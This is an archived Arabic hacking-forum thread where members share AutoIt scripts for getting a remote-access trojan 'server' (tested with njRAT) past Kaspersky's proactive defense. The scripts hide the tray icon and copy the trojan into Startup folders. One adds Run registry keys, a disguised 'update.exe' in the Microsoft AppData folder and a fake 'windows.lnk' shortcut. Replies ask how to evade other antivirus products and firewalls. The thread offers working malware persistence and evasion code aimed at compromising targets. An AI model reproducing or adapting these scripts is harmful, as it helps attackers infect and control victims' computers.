development-point - تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

صفحة 1 من 2

عرض 40 مشاركات من هذا الموضوع لكل صفحة

development-point (https://vb.development-point.com/index.php)

- قسم إختراق الأجـهـزه والأيـمـيـلات (https://vb.development-point.com/forumdisplay.php?f=17)

- - تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير" (https://vb.development-point.com/showthread.php?t=6590)

الباتش النّائم

02-22-2013 01:29 PM

تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

السّلام عليكم

جمعة مباركة نتمنّاها للجميع

الموضوع طرح أكثر من مرّة و جرّبت حلولا عديدة لكن للأسف أخفقت معها

راجعت بعض الأسطوانات عندي للغة AutoiT فوجدتــ أحدها يتكلّم عن العبارة الشّرطيّة if

قلت لما لا أطبّقها و أرى النّتيجة يعني " إن .....فـ"

مبدأ الفكرة:

هو أن جميع برامج البدأ تشتغل قبل الكاسبر ، يعني قبل هو ما يتحرّك يكون السّيرفر قد

ثبّت و لا مجال لمراقبته

سلبيّاتها:

لازم الشّخص المستهدف يعمل روستارت للجهاز ( يعني راح يعمل روستارت يعمل)

المتطلّبات:

*1 سيرفر كلين من الكاسبر لأيّ برنامج إختراقـ

*2 إعداداتك كاملة ( تثبيت في الرّيجيستري، مع التّشغيل و و و ....)

*3 برنامج الـ AutoiT (موجود في الموقع الرّسمي )

و لنبدأ على بركة الله بشرح الـ script المراد كتابته :

*1 نضع الشّرط : إن كان الكاسبر شغّالـ

*2 جواب الشّرط: السّيرفر لا يشتغل بل ينسخ نفسه في StartUp

يعني بمجرّد ما يشتغل الكمبيوتر يستغل السّيرفر

*3 إن كان العكس يشتغل السّيرفر مباشرة ( إضافةفقط)

الكود جاهز و قابل للإضافات

كود:

#NoTrayIcon

Opt("TrayIconHide", 1)

if ProcessExists("avp.exe") Then

FileCopy("server.exe",@startupDir)

Else

Run("server.exe")

EndIf

للعلم فقد تمّ تجربته قبل وضع هنا على Njrat و السّلام عليكم

EDZw4sS!m

02-22-2013 02:58 PM

رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

مشكور يعطيك العافية
جاري الجربة

MR:HACK

02-22-2013 04:25 PM

رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

مــشـــــكور اخي

بارك الله فيك

لكن استفسار بعد اذنك

ممكن ان اضع اكثر من بروسيس حماية في السكريبت

يعني

اضع الـ ( كاسبر ) + ( افيرا ) + ( افاست ) ++ الـــخ

منتظرك

ThE CrEzY

02-22-2013 05:54 PM

رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

اقتباس:

المشاركة الأصلية كتبت بواسطة mr:hack (المشاركة 22173)

نعم فالامر سهل

كل ما عليك ان تضيف جملة شرطية و تضع ما سيتم العمل داخل الجملة

بالتوفيق

MR:HACK

02-22-2013 06:07 PM

رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

اقتباس:

المشاركة الأصلية كتبت بواسطة the crezy (المشاركة 22193)

نعم فالامر سهل

كل ما عليك ان تضيف جملة شرطية و تضع ما سيتم العمل داخل الجملة

بالتوفيق

طيب , ممكن اسماء البروسيس

لجميع انواع الحمايات ( التي لها دفاعات استباقية )

منتظرك

ThE CrEzY

02-22-2013 06:18 PM

رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

اقتباس:

المشاركة الأصلية كتبت بواسطة MR:HACK (المشاركة 22196)

طيب , ممكن اسماء البروسيس

لجميع انواع الحمايات ( التي لها دفاعات استباقية )

منتظرك

لا اعرفها اخي للاسف ( يمكنك البحث في قوقل ) :SnipeR (37):

:SnipeR (60):

الباتش النّائم

02-23-2013 02:09 PM

رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

MR:HACK
---------

أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات

بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe

سنعيد كتابة السّكريب بتغيير بسيط

*1 إذا كان الكاسبر شغّالــ

كود:

If ProcessExists("avp.exe")

إذا then

قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ

كود:

FileCopy("server.exe",@StartupCommonDir)

*2 العكس else إن لم يكون شغّال يعني لو كانت حماية أخرى غيره

قم بنسخ ملف السّيرفر أيضا في قائمة بداية التّشغيلـ مع الإستبدال إذا كان موجود أصلا

كود:

FileCopy("server.exe",@StartupCommonDir,1)

و الكود ككلّ يصبح

كود:

#NoTrayIcon

Opt("TrayIconHide", 1)

If ProcessExists("avp.exe") Then

        FileCopy("server.exe",@StartupCommonDir)

Else

        FileCopy("server.exe",@StartupCommonDir,1)

EndIf

الباتش النّائم

02-23-2013 02:15 PM

رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

هذا كود إضافي من أحد الأصدقاء تستطيع به تشغيلـ سيرفر الـCyber و الـ Xtrem

تقولي لماذا هما فقط أقلّك شرطه:

* لا تفعّل خاصيّة البدأ مع الويندوز Run على البرنامج

* لا تفعّل خاصيّة الحقن

* لا تفعّل خاصيّة التّبيت بالروجيستري

السّكريبت يقوم بذلك المهم السّيرفر يكون كلين

كود:

if Not FileExists(@AppDataDir&"\Microsoft\update.exe") Then

        RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe")

        RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe")

        FileCreateShortcut("%APPDATA%\Microsoft\update.exe", @StartupDir & "\windows.lnk", "%APPDATA%\Microsoft\", "", "windows", @SystemDir & "\shell32.dll", "", "4", @SW_MINIMIZE)

        FileInstall("update.exe",@AppDataDir&"\Microsoft\update.exe",1)

EndIf

update.exe هو إسم سيرفرك و إختراقات موفّقة

Dr..ViRuS

02-23-2013 02:24 PM

رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

يعطيكـ العافيه ياغالي يستفيدو منو الشباب وفي كمان شفت شرح

تخطي الدفاع الاستباقي افيرا

موفق يابعدي

MR:HACK

02-24-2013 02:56 AM

رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

اقتباس:

المشاركة الأصلية كتبت بواسطة الباتش النّائم (المشاركة 22270)

mr:hack
---------

أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات

بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe

سنعيد كتابة السّكريب بتغيير بسيط

*1 إذا كان الكاسبر شغّالــ

كود:

if processexists("avp.exe")

إذا then

قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ

كود:

filecopy("server.exe",@startupcommondir)

كود:

filecopy("server.exe",@startupcommondir,1)

و الكود ككلّ يصبح

كود:

#notrayicon

opt("trayiconhide", 1)

if processexists("avp.exe") then

    filecopy("server.exe",@startupcommondir)

else

    filecopy("server.exe",@startupcommondir,1)

endif

اخي الكريم

هل هذا الكود يتخطى جميع الدفاعات الاستباقية للحمايات ؟!؟

و

هل يتخطى الفيروال ؟!؟

منتظرك

الساعة الآن 03:31 PM

صفحة 1 من 2

عرض 40 مشاركات من هذا الموضوع لكل صفحة

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47